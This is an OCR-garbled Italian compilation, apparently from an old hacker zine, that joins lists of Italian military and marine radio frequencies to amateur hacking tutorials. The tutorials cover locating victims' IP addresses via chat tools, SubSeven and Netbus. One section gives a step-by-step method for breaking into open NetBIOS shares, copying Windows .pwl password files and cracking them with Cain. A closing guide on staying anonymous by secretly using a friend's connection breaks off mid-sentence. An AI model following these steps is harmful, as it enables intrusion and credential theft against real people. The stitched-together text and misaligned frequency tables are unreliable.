AMI nord-est (località non prec.) VHF 138.150 
AMI (località imprecisata) VHF 138.500 
AMI (test motori) VHE 138.950 
Località imprecisata VHEF 139.100 
USAF (Usaraur) Vicenza VHEF 139.600 
USAF (regioni nord-est) VHF 140.250 
Località imprecisata nord-est VHEF 141.900 
Località imprecisata VHEF 142.450 
AMI VHF 142.500 
USAF Air-to-air VHF 142.725 
USAF Air.to-air VHF 142.825 
USAF (Usareur) Vicenza VHF 174.000 


AERONAUTICA LEGGERA ESERCITO 


Casarsa VHF 37.300 
Italia VHF 34.550 
USA VHF 34.550 
Italia (vigilanza aeroporti) VHF 37.000 
Italia soccorso esercito VHF 40.050 
Freq. Internazionale di guardia —VHF 40.500 
USA VHF 42.300 
USA Vicenza VHE 43.850 
Italia VHF 49.000 
Italia VHEF 50.000 
Italia (da verificare) VHEF 50.100 
Italia (da verificare) VHF 50.200 
Italia elicotteri VHEF 51.000 
USA elicotteri (regione Veneto)  VHF 75.100 
SERVIZI DI TERRA 


I servizi sono operativi negli aeroporti militari 


417 - 419 MHz (limiti di banda assegnati) 


MARINA CIVILE 


BANDA 156.000 - 162.025 MHz 


FREQUENZE ADIBITE A- EMERGENZA SICUREZZA SOCCORSO IN MARE 
156.300 (ch. 6) - Peril coordinamento di operazioni nella ricerca o salvataggio di natanti. 
156.525 (ch. 70) - Riservato per chiamate di soccorso ed emergenza con emissioni (Digital Selective Calling) 
( chiamata sellettiva digitale) per mezzi navali provvisti di adatti terminali. 


156.650 (ch. 13) - Per comunicazioni di messaggi inerenti la sicurezza della navigazione tra natanti. 
156.800 (ch. 16) - Per chiamate generali di emergenze e soccorso (Internazionale). 


FREQUENZA NAZIONALE PER TRASMISSIONE 
BOLLETTINO METEOMAR - OLTRE AD ALTRI AVVISI METEO 


156.425 (ch.68) 


STAZIONI VHF 


SEDI CANALI FREQUENZE ORARIO DI ASCOLTO 


CAPITANERIE DI PORTO (COMPAMARE) 


Imperia 11 156550 08/24 
Savona 13 156.650 08/24 
Genova 11 156.550 continuo 
La Spezia 11 156.550 08/24 
Marina di Carrara 15 156.750 08/24 
Viareggio 11 156.550 08/24 
18 161.500 08/24 
Livorno 14 156.700 08/24 
Portoferraio 11 156.550 08/24 
Civitavecchia 11 156.550 08/20 
Roma 14 156.700 08/20 
Gaeta 11 156.550 08/20 
Napoli 11 156.550 08/20 
Torre del Greco 14 156.700 08/20 
Castellammare di Stabia 11 156.550 08/20 
Salerno 11 156.550 08/20 
Vibo Valentia Marina 11 156.550 08/20 
Reggio Calabria 15 156.750 08/20 
Crotone 11 156.550 08/20 
Taranto 11 156.550 08/20 
Gallipoli 11 156.550 08/20 
Brindisi 11 156.550 08/20 
Bari 11 156.550 08/20 
Molfetta 14 156.700 08/20 
Manfredonia 14 155.700 06/20 
Pescara 11 156.550 06:30/23:30 
San Benedetto del Tronto 11 156.550 08/20 
Ancona 11 156.550 08/20 
Rimini 11 156.550 08/24 


Ravenna 08 156.400 08/24 


Chioggia 

Venezia San Marco 
Venezia (Tronchetto) 
Monfalcone 
Trieste 

Cagliari 

Olbia 

Porto Torres 
Messina 

Catania 

Augusta 

Siracusa 

Porto Empedocle 
Mazara del Vallo 
Trapani 

Palermo 


UFFICI CIRCONDARIALI MARITTIMI (CIRCOMARE) 


Alghero 

Anzio 

Arbatax 

Barletta 
Carloforte 

Gela 

Grado 

Ischia 

L.a Maddalena 
Licata 

Lipari 

Marsala 

Milazzo 

Oristano 

Ortona 

Pesaro 

Piombino 

Porto Santo Stetano 
Pozzuoli 

Procida 

Riposto 

San Ramo 

Santa Margherita Ligure 
Sant'Antioco 
Termini Imerese 
Temoli 

Torre Annunziata 


UFFICI MARITTIMI LOCALI (LOCAMARE) 


Alassio 
Amalfi 
Camogli 
Capri 
Cattolica 
Cesenatico 
Civitanova Marche 
Fano 
Formia 
Giulianova 
Lampedusa 


11 
11 
11 
14 
11 
15 
15 
15 
11 


156.750 
156.550 
156.550 
156.550 
156.550 
158.560 
156.700 
158.550 
156.700 
156.550 
156.550 
156.550 
156.550 
160.700 
156.550 
156.550 


156.550 
156.550 
156.550 
156.700 
156.550 
156.750 
156.750 
156.750 
150.550 
156.700 
156 550 
156.700 
156.550 
156.000 
155.600 
156.550 
156.600 
156.700 
156.750 
156.550 
156.700 
156.700 
156.550 
156.700 
156.700 
156.600 
156.750 


156.800 
155.700 
150.550 
156.700 
156.550 
156.800 
156.550 
156.550 
150.800 
156.700 
156.700 


08/24 
08/20 
08/20 
08/20 
08/20 
08/20 
08/20 
08/20 
continuo 
08/20 
06/20 
06/20 
08/20 
08/20 
08/20 
08/20 


08/20 
08/20 
08/20 
08/20 
continuo 
08/20 
08/20 
06/20 
08/20 
08/20 
08/20 
08/20 
08/20 
08/20 
08/20 
06/24 
08/20 
08/24 
08/20 
08/20 
08/20 
06/20 
08/20 
08/20 
08/20 
08/20 
08/20 


con dìsponbile 
08/20 
08/14 
08/20 
06/20 
08/20 
06/20 
08/20 
08/20 
08/20 
08/20 


Moladi Bari 
Monopoli 
Pantelleria 
Ponza 

Portici 

Porto Garibaldi 
Portoscuso 
Pozzallo 

Rodi Garganico 
Sciacca 
Senigallia 
Sorrento 
Terracina 

Trani 

Vasto 

Villa San Giovanni 


DELEGAZIONI DI SPIAGGIA (DELEMARE) 


Bagnara Calabra 
Bosa 


Castellammare del Golfo 


Castel Volturno 


Castiglione della Pescaia 


Catanzaro Marina 
Cervia 

Falconara 
Favignana 

Forte dei Marmi 
Gabicce 
Giovinazzo 

Goro 

Jesolo 

Isola del Giglio 
Ladispoli 

Lesina 

Lignano Sabbiedoro 
Margherita di Savoia 
Numana 

Otranto 

Paola 

Porto Cervo 
Porto Ercole 
Porto Levante 
Porto Palo 

Porto San Giorgio 
Riccione 
RioMartino 

Santa Marinella 
Sarroch 

Terrasini 

Tricase 

Vieste 


150.800 
156.700 
156700 

156.700 
156.550 
156.700 
156.800 
156.800 
156.700 
156.700 
156.550 
156.750 
156.700 
156.300 
156.600 
156.750 


156.800 
156.700 
156.800 
156.800 
156.800 
158.700 
156.700 
156.550 
156.550 
156.800 
156.550 
156.800 
156.800 
156.800 


156.800 
156.800 
156.800 
156.800 
156.550 
156.550 
156.700 
156.700 
156.600 
156.550 
156.800 
156.800 
156.800 
156.550 
156.800 
156.750 
156.800 
156.700 
156.700 


-156.450 


08/20 
08/20 
08/20 
08/20 
08/20 
08/20 
08/20 
08/20 
08/20 
08/20 
08/24 
08/20 
08/20 
08/20 
08/20 
08/20 


08/20 
08/20 
08/14 
08/14 
non disponibile 
08/20 
08/20 
08/20 
08/14 
08/20 
08/20 
non disponibile 
08/14 
non disponibile 
non disponibile 
non disponibile 
non disponibile 
08/20 
08/20 
08/20 
08/20 
08/20 
08/20 
08/20 
08/20 
08/14 
08/20 
08/20 
08/20 
08/20 
07/20 
08/20 
08/14 
08/20 


METEOMAR REGIONALI 


IN RADIOTELEFONIA VHEF 


(diffusione in onde metriche - gli orari di trasmissione sono UTC) 


Tutte le stazioni effettuano trasmissioni di: “Avvisi ai naviganti” - “Avvisi di tempesta” - “Meteomar” - 
con diffusione in lingue italiane e inglese. 
Le trasmissioni degli “Avvisi ai naviganti” e del bollettino “Meteomar” 
sono precedute da un preavviso effettuato da tutte le stazioni sulla frequenza 156.800 (ch.16). 


NOMINATIVI STAZIONI CANALI FREQUENZE ORARI DI DIFFUSIONE 
Ancona 25 161.850 01.35. 07.35. 13.35 19.35 
Augusta 26 161.900 01.50 07.50. 13.50. 19.50 
Bari 26 161.900 01.35. 07.35. 13.35 = 19.35 
27 161.950 
Cagliari 25 181.850 01.35. 07.35. 13.35 19.35 
26 161.900 
27 161.950 
Civitavecchia 27 161.950 0135 07.35 13.35 19.35 
Crotone 25 161.850 01.50. 07.50. 13.50 19.50 
Genova 25 161.850 01.35. 07.30 13.35 19.35 
27 161.950 
Lampedusa 26 161.900 01.50 07.50. 13.50. 19.50 
Livorno 26 161.900 01.35. 07.35. 13.35 19.35 
64 161.825 
Marzara del Vallo 25 161.850 01.50 07.50. 13.50. 19.50 
26 161.900 
Messina 25 161.850 01.35. 07.35. 13.35 19.35 
Napoli 25 161.850 01.35. 07.35. 13.35 19.35 
27 161.950 
Palermo. 27 161.960 01.35. 07.35. 13.35 19.35 
Pescara 26 161.900 07.50. 13.50 
PortoCervo 25 161.850 01.50. 07.50. 13.50 19.50 
26 161.900 
28 162.000 
PortoTorres 26 161.900 01.50. 07.50. 13.50. 19.50 
Ravenna 27 161.950 0150 07.50. 13.50 
19.50 
Roma 25 161.850 01.35. 07.35 13.35 19.35 
Taranto 26 161.900 01.35. 07.35. 13.35 19.35 
Trapani 25 161.850 01.50. 07.50. 13.50 19.50 
Trieste 25 161.850 01.35. 07.35. 13.35 19.35 
88 162.025 
Venezia 26 161.900 01.50 07.50 1350 19.50 


27 161.950 


CORPORAZIONI DI PILOTI 


PORTI MARITTIMI MERCANTILI 


Canali adibiti alle Capitanerie di Porto per il controllo del traffico portuale 
(ch.18) 161.500 —(ch19) 161.550 (ch20) 161.600  (ch.21) 161.650 
(ch.22) 161.700 (ch.79) 161.575 (ch.80) 161.625 


NOMINATIVI STAZIONI CANALI — FREQ. - PILOTI FREQ.- AVVISATORE 


Genova 12-10 156.600 156.500 
14 156.700 
Imperia 11 156.550 
12 156.600 
Savona 13 156.650 
Quiliano - Vado Ligure 13 156.650 
Livorno 12 -10 156.600 156.500 
Piombino 13 156.650 
Portoferraio 12 156.600 
Porto Santo Stefano 12 156.600 
Viareggio 12 156.600 
13 156.650 
Anzio 12 156.600 
13 156.650 
14 156.700 
Fiumicino 12 156.600 
Gaeta 12 156.600 
Napoli 12 156.600 
Bagnoli 09 156.450 
12 156.600 
Castellammare di Stabia 11 156.550 
Torre Annunziata 15 156.750 
Salerno 14 156.700 
Gioia Tauro 09 156.450 
Vibo Marina 14 156.700 
Palermo 11 156.550 
12 156.600 
Termini merese 12 156.600 
Milazzo 14 156.700 
Trapani 12 156.600 
Marsala 12 156.600 
14 156.700 
Marzara del Vallo 11 156.550 
Licata 12 156.600 
Porto Empedocle 12 156.600 
Gela 12 156.600 
Siracusa 14 156.700 
Augusta 12 156.600 
Catania 12 156.600 
Messina 12 156.600 (per transito stretto verso Sud) 
Raggio Calabria 12 156.600 (per transito stretto verso Nord) 
Crotone 14 156.700 
Taranto 12 156.600 
Gallipoli 11 156550 
Brindisi 12 156.600 


Bari 12 156.600 


Barletta 
Molfetta 
Monopoli 
Manfredonia 
Pescara 

San Benedetto del Tronto 
Ancona 
Ravenna 
Venezia 
Chioggia 
Portogruaro 
Monfalcone 
Trieste 
Olbia 
Arbatax 
Cagliari 
Portofoxi 
Portovesme 
Sant'Antioco 
Oristano 
Porto Torres 


156.700 
156.600 
156.600 
156.600 
156.600 
156.550 
156.600 
156.600 
156.650 
156.700 
156.600 
156.700 
156.700 
156.700 
156.550 
156.600 
156.450 
156.600 
156.600 
156.600 
156.600 


156.450 


MARINA MILITARE 


Vengono riportati tre gruppi di frequenze utilizzati nell’ambito militare 
con esclusione dei numeri dei canali, delle località portuali operative, nonchè del servizio in asse attuato. 


L’utilizzo di detti canali da parte dei mezzi navali militari avviene esclusivamente previa chiamata sul 


Ch. 16 (156.800). 


ALFA CHARLIE PORTUALI 
157.425 155.500 156.375 
157.450 155.550 156.625 
157.475 155.650 

157.500 155.750 

157.525 155.850 

157.550 155.900 

157.575 155.925 

157.600 155.950 

157.625 155.975 


157.650 156.000 


-= COME TROVARE I CODICI IP =- 


by 
LiQuiD 
AVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVI 
Premessa: 


Un indirizzo IP è formato da quattro campi di numeri da tre cifre, questo è 
l'esempio del formato xxx.xxx.xxx.xxx; nei quattro campi, i numeri possono 
variare da 0 a 255, grazie ad esso è possibile individuare univocamente un 
computer connesso alla rete. 


Cominciamo... 
I modi per conoscere l'IP di qualcuno sono diversi, e possiamo farlo: 


1) TRAMITE UN SITO 

Si possono creare siti che danno la possibilità di catturare l'ip dell'utente 

che sta navigando, quest'IP può automaticamente essere spedita ad un database e 
chi possiede l'accesso, tramite la vostra IP potrà ottenere anche informazioni 
personali sul vostro conto, quindi per la navigazione è comodo usare un server 
proxy che nasconde sotto il suo, il vostro IP. 


2) TRAMITE CHAT 

Se si è connessi in chat, qualsiasi azione compiamo come mandare un file o un 
messaggio, rende visibile il nostro IP al programma per chattare. Non tutte le 
chat rendono visibile tutto l'indirizzo IP alcune lo occultano e lo presentano 

in questo modo es. 212.213.175.XXX in questa maniera non è possibile attaccare 
in maniera diretta la nostra vittima, ma dovremmo effettuare uno Scanport per 
vedere es. da 212.213.175.0 a 212.213.175.255 quanti computer sono connessi in 
quel momento e cercare tra questi l'IP della nostra vittima. Nelle chat come 

IRC e ICQ il problema non si pone perchè possiamo individuare l'IP intero di 

chi vogliamo. Con IRC basta digitare nella finestra "Status" questo comando 
/dns nomevittima e automaticamente ci apparirà l'IP. In ICQ invece l'IP può 
anche essere occultata ma con un programma di nome ICQ IP SNIFFER (clicca per 
il download) è possibile trovarla. Esiste ancora un altro metodo che sfrutta 

delle applicazioni già presenti nel windows, quindi se sta avvenendo uno 
scambio di informazioni tra il nostro pc e un altro, il sistema per permettere 

il trasferimento dei dati apre delle porte a nostra insaputa, che possiamo 

però visualizzare digitando al prompt di MS-DOS questo comando netstat -a -n 
ciò che apparirà saranno gli indirizzi IP con cui il nostro sistema sta 
comunicando e le relative porte di accesso, l'IP dell'utente che vogliamo 
individuare di solito è connesso ad una porta superiore alla 1025. Un metodo 

per trovare il nostro indirizzo IP è digitando "Winipcfg" in "Esegui" nel menu 
"Avvio". 


COME RUBARE UN ACCOUNT 


Ciao a tutti!Quello che vi sto' x trattare è un argomento complesso 


ma se avete qualche domanda potete contattarmi in irc(server:irc.jnet.it 
chan #hackzxtreme Nick=Max) 


Cominciamo!quello di cui avete bisogno sono 2 cose:un programma di 
nome cain(che decripta i file pwl cioe' 


i file contenenti le pass di un sistema di tipo windows)e un programma 
che scanna i computer alla ricerca di 


quelli con il netbios attivo(il netbios è una backdoor cioe' una porta 
aperta del vostro computer che vi permette 


di penetrare in un sistema accedendo al disco che il sistema 
condivide(C,D,A,ecc) e che si chiama legion. 


dopo che avete i prog settate alcune cose prima di cominciare e cioe': 


1)aprite il apnnelo di controllo, connessione remota è cliccate con il 
tasto destro sulla 


connessione che usate selezionando proprieta'.Dopodiche' selezionate 
protezione e cliccate su 


accedi alla rete.Fatto questo salvate e chiudete il tutto. 


2)andate in pannello di controllo e su reti dopodiche' cliccate aggiungi e 
cliccate client,selezionate client per reti 


microsoft e aggiungetelo.riavviate il computer. 


3)a questo punto aprite il legion(questi prog li trovate su 
www.packetstorm.securify.com)e scrivete 


un range di ip che volete scannare(esempio da 122.12.1.1 a 
122.12.64.255 poiche' potete scannare fino a 64 sottoreti x 


ogni ip)dopodiche' troverete una lista di computer netbiossati con i quali 
avrete accesso fisico al disco.X entrare nel 


sistema non dovete far altro che copiare quello che trovate con il 
legion(esempio \\112.12.24.26\C)e scriverlo andando in 


risorse del computer e cliccando su strumenti e connetti unita' di rete e 
scrivendo cio'che avete trovato con il lesion 


potete trovare dei computer con le pass o che non vi diano accesso ma 
la maggior parte sono condivisibili a tutti gli effetti > 7) 


una volta entrati vi verra' mostrato l'hd del computer e voi dovrete 
andare su start-esegui 


e scrivere command.arrivati sulla shell dos scrivete F:(0 G:o H: a 
seconda della lettera assaegnata al computer) 


poi scrivete cd windows e successivamente scrivete copy *.pwl 
C:(questo comando copiera' tutti i file pwI sul vostro hard disk) 


dopodiche' prendete il cain(se avete l'antivirus vi dira' che è un virus ma 
voi andate tranquilli non vi infetta —_® 


e apritelo.Andate sulla chiave(icona grafica e selezionatela, dopodiche' 
andate su file,selezionate add to list e selezionate il file) 


dopodiche' selezionate il file e cliccando il il tasto destro selezionate 
"try another username" e mettetegli come user 


il nome del file pwl che avete preso.Nella maggior parte dei casi 
troverete le pass e bastera' cliccare con il tasto destro sul file 


scegliere "show cached pass" x trovarle,senno' dovrete usare un progxi 
file alternativo(tipo pwIlhack) x craccare le pass. 


Questo metodo serve x trovare qualsiasi pass di un qualsiasi 
account(libero,galactica,tin, ecc). 


Raccomando a tutti di limitarvi a scaricare le pass o copiare quel che si 
vuole ma nona cancellare i file del computer(a meno che non è il vostro 


peggior nemico © 7) 


Come verificare la propria posta elettronica con Telnet 


Con questo articolo impareremo a verificare la nostra posta elettronica collegandoci al nostro server 
POP 3 (il server che contiene le nostre e-mail) attraverso Telnet. 

Telnet è un programma fornito con qualsiasi versione di windows e permette di collegarsi ad un 
qualsiasi computer e lavorare proprio come se fossimo sulla macchina a cui siamo collegati. 


Questa tecnica è particolarmente utile per eliminare email con attachment indesiderati voluminosi, 
senza doverli scaricare. Può essere inoltre un ottimo metodo per verificare le inefficenze del server 
o lo spazio ancora disponibile. 

Per aprire Telnet è sufficiente cliccare sul menù Avvio (Start per le versioni più recenti di 
Windows) e scegliere la voce Esegui. A questo punto scriviamo telnet e premiamo OK. Si aprirà 
questa finestra: 


ii Telnet - (nessuna) BL =10j.xj 


Connetti Modifica Terminale ? 


î 


A questo punto dobbiamo collegarci al nostro server di posta elettronica alla porta 110. Scegliamo 
quindi dal menù Connetti la voce Sistema Remoto e inseriamo i dati che ci vengono richiesti: 


Connetti MM" 


Nome host: [popmail libero.t. | 
Porta: fi 10 M | 
Tipo terminale: feti 00 ha | 


Come si può notare dall'immagine, per questo esempio sto usando un'account di posta fornito da 
Libero, ma questo sistema per il controllo della posta funziona con tutti i provider che hanno un 
server POP 3 per la gestione delle e-mail. 

Adesso, cliccando su Connetti ci apparirà il messaggio di benvenuto del server: 


gl Telnet - popmail.libero.it 
Connetti Modifica Terminale ? 
+0K POP3 server ready ({NPlex 2.1.115) <65904b0.974046641900Gpop3.libero.it> 4 


Ora ci dobbiamo far riconoscere, dobbiamo quindi inviare il nostro user name e la nostra password. 
Per fare ciò dobbiamo utilizzare la chiave user nostrousername e premiamo INVIO. Il server ci 
risponderà con la dicitura +OK. A questo punto dobbiamo anche inviare la nostra password con la 
parola chiave pass nostrapassword. Se tutto è andato bene ci apparirà questa schermata: 


cl Telnet - popmail.libero.it eee. IO 


Connetti Modifica Terminale ? 

+0K POP3 server ready ({NPlex 2.1.115) <857bfbe.974046742000Gpop2.libero.it> “| 
+0K | 
+0K 


Fate attenzione a scrivere bene sia user name che password perchè Telnet non visualiza ciò che noi 
digitiamo, ma solo le risposte inviate dal server di posta. 
Una volta che ci siamo collegati, possiamo gestire la nostra posta attraverso i seguenti comandi: 


e "list" vi consente di vedere la lista dei messaggi presenti nel server; 

e "retr n° messaggio" vi consente di visualizzare un messaggio. Attenzione a non usarlo con 
messaggi di dimensioni elevate; 

e "top n° messaggio" vi consente di visualizzare l'intestazione del messaggio, mostrando il 
mittente e l'oggetto. 

e "dele n° messaggio" consente la cancellazione di un messaggio. I messaggi marcati con 
questo comando verranno cancellati solo dopo il comando quit; 

e "rset" per ripristinare eventuali danni causati dal comando precedente. Vi consente di 
recuperare i messaggi marcati per la cancellazione 


"quit" vi consente di chiudere il collegamento con il server di posta, salvando gli eventuali 
cambiamenti da voi effettuati 


TROVARE L’IP DI UN PC CONNESSO A INTERNET 


Trovare l'indirizzo IP di un compter connesso ad Internet 


I metodi per ottenere il vostro indirizzo IP sono molti, i più comuni sono due: 


Tramite un programma per chattare (ad esempio con IRC), quando inviate una immagine, un 


programma o qualunque file rendete visibile il vosto indirizzo IP direttamente dal programma per 


chattare. Ad esempio con IRC basta cliccare con il bottone destro del mouse sul nome della persona 
a cui si vogliono fare le cattiverie ed andare sulla voce get URL e sara fornito l'IP di quella persona 


il formato degli indirizzi IP è xxx.xxx.xxx.xxx dove ogni xxx è un numero compreso tra 0 e 255. 


Con ICQ saper il vostro IP è facile basta vedere su MORE INFORMATION di un utente, nel caso 
abbiate occultato il vostro IP esiste un programma ad hoc per ICQ detto ICQ IP SNIFFER 


(disponibile, ringrazio Valentine) che mostra comunque il vostro indirizzo IP, altro programma che 


mostra l'IP di un utente connesso ad ICQ è SubSeven (disponibile) il quale sfrutta anche il server 


del netbus 1,7. 


Se volete colpire un utente del suo stesso provider basta che vi colleghiate ad internet più volte e ad 


ogni connessione lanciate il programma fornito con Windows 95/98 chiamato Winipcfg.exe, il 
quale fornirà lindirizzo IP del computer dell'hacker connesso ad internet, l'hacker a questo punto si 


segna i campi fissi che assegna il server, in genere sono i primi tre (o i primi due se il provider è 


molto grande) in questo modo gli basta fare una scansione dei vari indirizzi inserendo 


consecutivamente i campi non fissi fino a trovare un computer infettato (il Netbus fa la scansione 


automatica inserendogli la gamma di indirizzi da scandire). 


Altro modo per ottenere l'IP è creando un sito un po' malvagio che cattura i vostri dati; in genere 


catturare i vostri dati serve solo per le statistiche dei visitatori, un esempio di ciò è nella mia pagina 
di ingresso del mio sito dove i vostri dati vendono trattati solo a scopo informativo, per vedere le 


satistiche clicca sull'icona e potrai vedere anche il tuo indirizzo IP). 


Alcune volte gli hackers vedono gli indirizzi IP degli utenti collegati ad un provider e vedono quali 


campi degli indirizzi IP sono univoci per tutte le persone collegate ad un certo provider (ad esempio 


IOL ha come campi univoci 212.52.6x.xxx 212.52.7x.xxx, oppure TIN 212.216.xxx.xxx, si possono 


riconoscere facilmente cliccando sull'icona descritto al punto precedente); in questo modo se 


l'hacker conosce con quale provider vi collegate dovrà fare una scansione di pochi indirizzi IP per 


ritrovarvi (Netbus fa la scansione automatica degli indirizzi IP), si deve fare una scansione ogni 


volta che il computer infetto si ricollega ad internet in quanto ad ogni connessione ad internet al 
computer infetto viene fornito un indirizzo IP diverso. 


Altro modo (per hackers esperti) è quello di utilizzare programmi per la gestione avanzata degli 


indirizzi IP come Netlab (disponibile) il quale riesce ad individuare anche la lista degli utenti 


collegati ad un provider, non basta, con questo programma un hackers può dirvi anche il vostro 
indirizzo di casa. 


Altri programmi per intercettare una persona sono forniti gratuitamente con il Dos (e quindi anche 
con il Windows) e sono tracert e netstat. 


Esistono comunque molti altri metodiche sfruttano bug (errori) di sistema dei server, bug dei 
firewall o programmi specifici, esiste un sito che vi spiega come fare. 


Tramite il vostro indirizzo IP chiunque può sapere con quale provider vi collegate e addirittura la 
posizione geografica del server con cui siete collegati ad internet in quel momento, un programma 


in grado di fare ciò è Visual route (disponibile). 


l'indirizzo IP cosa è? come posso fregarlo? 


Il migliore dei modi per farvi sgamare mentre fate le vostre caxxate è quello di farvi fregare l'IP che 
difficilmente nascondibile.Ma c'è anche il rovescio della medaglia potete ciulare l'ip a qualcunoè 
utilizzarlo per fare tante belle cosuccie'!IO vi consiglio sempre di non farle poi la scelta è vostra!!VI 
RICORDO COMUNQUE CHE PENETRARE NEL PC DI ALTRI é ILLEGALE E PER TANTO 
PUNIBILE!! 


Cos'è un IP 


Un indirizzo IP è un indirizzo che identifica univocamente un computer connesso alla rete. I metodi 
per scoprire l'IP di un computer sono molti, i più comuni sono questi: 


COME SCOVARE L'IP DI UN ALTRO UTENTE 


Metodo Chat 


Tramite un programma per chattare (ad esempio con IRC o ICQ), quando inviate una immagine, un 
programma, un messaggio o altro rendete visibile il vosto indirizzo IP direttamente dal programma 
per chattare. Con IRC basta cliccare con il bottone destro del mouse sul nome della persona a cui si 
vogliono fare le cattiverie ed andare sulla voce "get URL" e sara fornito l'IP di quella persona (il 
formato degli indirizzi IP è xxx.xxx.xxx.xxx dove ogni xxx è un numero compreso tra 0 e 255). 
Con ICQ saper il vostro IP è facile basta vedere su "User's details" di un utente, nel caso abbia 
occultato il suo IP esiste un programma ad hoc per ICQ detto ICQ IP SNIFFER che mostra 
comunque il suo indirizzo IP. Altro programma che mostra l'IP di un utente connesso ad ICQ è 
SubSeven il quale sfrutta anche il server del netbus 1.7 


Metodo SS (Site Sniffer) 


Altro modo per ottenere l'IP è creando un sito che cattura i vostri dati; in genere catturare i vostri 
dati serve solo per le statistiche dei visitatori del sito. Alcune volte gli hackers vedono gli indirizzi 
IP degli utenti collegati ad un provider e vedono quali campi degli indirizzi IP sono univoci per 
tutte le persone collegate (ad esempio IOL ha come campi univoci 212.52.6x.xxx 212.52.7x.xxx, 
oppure TIN 212.216.xxx.xxx); in questo modo se l'hacker conosce con quale provider vi collegate 
dovrà fare una scansione di pochi indirizzi IP per ritrovarvi (Netbus fa la scansione automatica degli 
indirizzi IP). E' indispensabile fare una scansione ogni volta che il computer infetto si ricollega ad 
internet in quanto ad ogni connessione viene assegnato un indirizzo diverso. 


Metodo Expert 


Altro modo (per hackers esperti) è quello di utilizzare programmi per la gestione avanzata degli 
indirizzi IP come Netlab il quale riesce ad individuare anche la lista degli utenti collegati ad un 
provider. Non basta, con questo programma un hackers può dirvi anche il vostro indirizzo di casa. 
Altri programmi per intercettare una persona sono forniti gratuitamente con Windows 95 o 
superiore e sono TRACERT e NETSTAT (Si lanciano da Start - Esegui...). Esistono comunque 
molti altri metodi che sfruttano bug (errori) di sistema dei server, bug dei firewall o programmi 
specifici, esiste un sito che vi spiega come fare. 


Tips & Tricks 


Tramite il vostro indirizzo IP chiunque può sapere con quale provider vi collegate e addirittura la 
posizione geografica del server con cui siete collegati in quel momento; un programma in grado di 
fare ciò è Visual route. Se un hacker vuole colpire un utente del suo stesso provider basta che si 
colleghi ad internet più volte e ad ogni connessione lanci il programma fornito con Windows 95/98 
chiamato Winipcfg.exe, il quale fornirà lindirizzo IP del suo computer; l'hacker a questo punto si 
segnerà i campi fissi assegnati dal server, in genere sono i primi tre (o i primi due se il provider è 
molto grande), in questo modo gli basterà fare una scansione dei vari indirizzi inserendo 
consecutivamente i campi non fissi fino a trovare un computer infettato (Netbus fa la scansione 
automatica inserendogli la gamma di indirizzi da scandire). 


Conclusioni 


Non ho reso disponibili i programmi che ho citato al fine di scoraggiarvi nel compiere azioni 
dannose nei confronti di un qualsiasi innocuo pesciolino che nuota ignaro degli squali che ci sono 
nel mare di internet. 


Trovare l'indirizzo IP di un computer connesso ad 
Internet 


| metodi per ottenere il vostro indirizzo IP sono molti, i più comuni sono due: 


Tramite un programma per chattare (ad esempio con IRC), qunado inviate 
una immagine, un programma o qualunque file rendete visibile il vosto 
indirizzo IP direttamente dal programma per chattare. Ad esempio con IRC 
basta cliccare con il bottone destro del mouse sul nome della persona a cui 
si vogliono fare le cattiverie ed andare sulla voce get URL e sara fornito l'IP 


di quella persona (il formato degli indirizzi IP è xxx.xxx.xxx.Xxx dove ogni xxx 
è un numero compreso tra 0 e 255. Con ICQ saper il vostro IP è facile basta 
vedere su MORE INFORMATION di un utente, nel caso abbiate occultato il 
vostro IP esiste un programma ad hoc per ICQ detto ICQ IP SNIFFER che 
mostra comunque il vostro indirizzo IP, altro programma che mostra l'IP di un 
utente connesso ad ICQ è SubSeven il quale sfrutta anche il server del 
netbus 1,7. 


Se un hacker vuole colpire un utente del suo stesso provider basta che si 
collega ad internet più volte e ad ogni connessione lancia il programma 
fornito con Windows 95/98 chiamato Winipcfg.exe, il quale fornirà lindirizzo 
IP del computer dell'hacker connesso ad internet, l'hacker a questo punto si 
segana i campi fissi che assegna il server, in genere sono i primi tre (o i primi 
due se il provider è molto grande) in questo modo gli basta fare una 
scansione dei vari indirizzi inserendo consecutivamente i campi non fissi fino 
a trovare un computer infettato (il Netbus fa la scansione automatica 
inserendogli la gamma di indirizzi da scandire). 


Altro modo per ottenere l'IP è creando un sito un po' malvagio che cattura i 
vostri dati; in genere catturare i vostri dati serve solo per le statistiche dei 
visitatori, un esempio di ciò è nella pagina di benvenuto del mio sito dove i 
vostri dati vengono trattati solo a scopo informativo, per vedere le satistiche 
clicca sull'icona dell'elenco dettagliato dei collegamenti (se attendi che si 
carica l'icona quando ci cliccherai sopra potrai vedere anche il tuo indirizzo 
IP). 


Alcune volte gli hackers vedono gli indirizzi IP degli utenti collegati ad un 
provider e vedono quali campi degli indirizzi IP sono univoci per tutte le 
persone collegate ad un certo provider (ad esempio IOL ha come campi 
univoci 212.52.6x.XXX 212.52.7x.xxx, oppure TIN 212.216.XXX.XXX, Si 
possono riconoscere facilmente cliccando sull'icona descritto al punto 
precedente); in questo modo se l'hacker conosce con quale provider vi 
collegatedovrà fare una scansione di pochi indirizzi IP per ritrovarvi (Netbus 
fa la scansione automatica degli indirizzi IP), si deve fare una scansione ogni 
volta che il computer infetto si ricollega ad internet in quanto ad ogni 
connessione ad internet al computer infetto viene fornito un indirizzo IP 
diverso. 


Altro modo (per hackers esperti) è quello di utilizzare programmi per la 
gestione avanzata degli indirizzi IP come Netlab il quale riesce ad 
individuare anche la lista degli utenti collegati ad un provider, non basta, con 
questo programma un hackers può dirvi anche il vostro indirizzo di casa. 


Altri programmi per intercettare una persona sono forniti gratuitamente con il 
Dos (e quindi anche con il Windows) e sono tracert e netstat. 


Esistono comunque molti altri metodiche sfruttano bug (errori) di sistema dei server, bug 
dei firewall o programmi specifici, esiste un sito che vi spiega come fare. 

Tramite il vostro indirizzo IP chiunque può sapere con quale provider vi collegate e 
addirittura la posizione geografica del server con cui siete collegati ad internet in quel 
momento, un programma in grado di fare ciò è Visual route. 


Guida per rimanere anonimi 


di Lord Hawk 
Allora, comincerei nel dire che rimanere anonimi in internet è una cosa fondamentale!!! 


Non ho voglia di elencarvi tutti i vari motivi per cui dovete rimanere anonimi! 


II metodo più semplice per rimanere anonimi è quello di utilizzare una connessione di un amico o un 
nemico... 


Logicamente è !!meglio!! che il vostro "amico" sia allo scuro di tutto. In questo modo il provider 
crederà che il signor XXX (l'amico nemico) sia collegato ad internet ma non saprà mai che ci sei tu 
dietro a quella identità! In questo modo tutte le azioni che farai lasceranno sì delle tracce ma non le 


